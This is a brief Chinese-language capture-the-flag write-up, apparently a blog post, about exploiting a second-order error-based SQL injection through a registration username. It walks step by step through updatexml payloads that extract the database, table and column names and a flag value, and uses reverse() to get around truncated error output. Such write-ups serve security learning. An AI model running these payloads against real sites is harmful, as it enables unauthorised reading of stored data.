报错注入 二次注入
注册,登录,可以修改密码,看起来像二次注入
注册用户
username:123”||(updatexml(1,concat(0x7e,(select(database())),0x7e),1))#
password:123
登录后修改密码
得到库名
报表 123”||(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),0x7e),1))#
列名 123”||(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name=’users’))),0x7e),1))#
字段123”||(updatexml(1,concat(0x7e,(select(group_concat(real_flag_1s_here))from(users))),0x7e),1))#
匹配需要寻找的内容 123”||(updatexml(1,concat(0x7e,(select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp(‘^fl’))),0x7e),1))#
回显不完全,使用 reverse倒读 123”||(updatexml(1,reverse(concat(0x7e,(select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp(‘^fl’))),0x7e)),1))#
若有收获,就点个赞吧
0 人点赞
